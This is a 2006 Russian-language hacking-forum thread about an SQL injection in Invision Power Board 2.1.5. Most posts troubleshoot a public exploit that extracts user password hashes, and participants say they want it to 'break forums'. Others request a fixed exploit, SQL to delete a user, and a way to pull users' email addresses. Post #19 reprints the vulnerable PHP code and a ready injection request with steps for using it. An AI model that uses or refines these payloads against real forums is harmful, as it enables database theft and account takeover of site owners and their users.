Форумы SQL инъекция Invision Power Board 2.1.5

Discussion in 'Уязвимости CMS/форумов' started by Go0o$E, 1 May 2006.

  1. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    302
    Likes Received:
    228
    Reputations:
    401
    #1 Go0o$E, 1 May 2006
    Last edited: 5 Nov 2006
  2. Lord Nikon

    Lord Nikon Banned

    Joined:
    12 Sep 2005
    Messages:
    225
    Likes Received:
    15
    Reputations:
    -3
    слышьте можете подсказать где в сплойте синтаксическая ошибка или что там,а то он не может ломать форумы
    +(.
     
    1 person likes this.
  3. RusH

    RusH New Member

    Joined:
    1 May 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Go0o$E а что за бага?
    target userid - это номер юзера которого хочу узнать пароль?
     
  4. RusH

    RusH New Member

    Joined:
    1 May 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Attempting to extract password hash from database...
    0Error: SQL error.
    Что это зачит?
     
  5. nec

    nec Elder - Старейшина

    Joined:
    6 Jul 2005
    Messages:
    98
    Likes Received:
    20
    Reputations:
    1
    правильно, там фсе подробно описано.Фсе работает
     
  6. Black_Death

    Black_Death New Member

    Joined:
    16 Nov 2004
    Messages:
    26
    Likes Received:
    1
    Reputations:
    -1
    Attempting to extract password hash from database...
    000000000000000000000000000000 (вобщем куча нулей)
    пропатчен шоль?
     
  7. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    371
    Likes Received:
    165
    Reputations:
    45
    Смотри сорсы:)
     
  8. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,126
    Likes Received:
    816
    Reputations:
    97
    Править его надо...
     
  9. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    997
    Likes Received:
    905
    Reputations:
    587
    Мало того, в этом сплоите есть проверка на $resp->content !~ /there is no such member/i , что не сработает на русской версии форума :)

    В общем, когда посмотрел респонз выяснилось, что личное сообщение не отправляется, т.к. не найден пользователь с тем номером, что я ввожу, и выводится постоянно 0. У кого нибудь работает?
     
    #9 Qwazar, 2 May 2006
    Last edited: 2 May 2006
  10. TRes

    TRes New Member

    Joined:
    22 Apr 2006
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    А исправленный отлично работает и на русской версии :)
     
  11. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    ну так выложи....исправленный....
     
  12. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    371
    Likes Received:
    165
    Reputations:
    45
    TRes,кинь людям сорс.
     
  13. Black_Death

    Black_Death New Member

    Joined:
    16 Nov 2004
    Messages:
    26
    Likes Received:
    1
    Reputations:
    -1
    Мдя, опять править...скажите хоть в какой строке ошибка...
     
  14. TRes

    TRes New Member

    Joined:
    22 Apr 2006
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Там не ошибка. Он и в исходном виде на английской версии IPB будет прекрасно работать. А на русской неисправленный сплоит выдает Post ошибку. На ветке же 2.0.х как раз и получаются нули вместо хеша.
     
    1 person likes this.
  15. 4lex

    4lex New Member

    Joined:
    2 May 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    а у меня вообще не запускается сплоит от milw0rm через cygwin :-(. Что там надо исправить? или дайте рабочую версию. :)
     
  16. Black_Death

    Black_Death New Member

    Joined:
    16 Nov 2004
    Messages:
    26
    Likes Received:
    1
    Reputations:
    -1
    На русском 2.1.1 нет post-еррора, но нули вместо хеша, а на 2.1.5 post-error! Выложи плз рабочий!
     
  17. CaH9

    CaH9 Elder - Старейшина

    Joined:
    16 Apr 2006
    Messages:
    34
    Likes Received:
    10
    Reputations:
    0
    как будет выглядеть sql команда на удаление пользователя с ником lol ?
     
  18. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    570
    Likes Received:
    160
    Reputations:
    179
    Реално тестил на 2 1 4 , всё работает,но даёт только 0000000000000000, значить всё проходит, проста какаята фикса стоит ))
     
  19. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    Invision Power Board v2.1.5 Remote SQL Injection

    Filename :- func_mod.php
    Functionname :- post_delete()
    Lines :- 89 To 209

    Bug Found By :- Devil-00

    Greetz :-
    Rock Master ^ Hackers Pal ^ n0m4rcy ^
    www.securtygurus.net

    Code:
    
    if ( is_array( $id ) )
    {
    if ( count($id) > 0 )
    {
    $pid = " IN(".implode(",",$id).")";
    }
    else
    {
    return FALSE;
    }
    }
    else
    {
    if ( intval($id) )
    {
    $pid   = "=$id";
    }
    else
    {
    return FALSE;
    }
    }
    
    
    When $id = array .. the code don't check it if ( INTVAL )

    Code:
    if ( count($id) > 0 )
    {
    $pid = " IN(".implode(",",$id).")";
    }
    
    Then We Can Do SQL Injection Here >>

    Code:
    $this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );
    
    And Here >>

    Code:
    $this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );
    
    Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :(

    Exm. To Exploit

    1- First Add 2 Post
    2- Check It To Delete
    3- Edit String Query By HTTPLiveHeader

    Code:
    act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
    
     
    _________________________
  20. _nic

    _nic Elder - Старейшина

    Joined:
    5 May 2006
    Messages:
    651
    Likes Received:
    54
    Reputations:
    3
    Такой вопрос:Можно ли через sql инъект вытащить мыло из акка юзера на IPB?Или придется брутить его пароль?
     
Loading...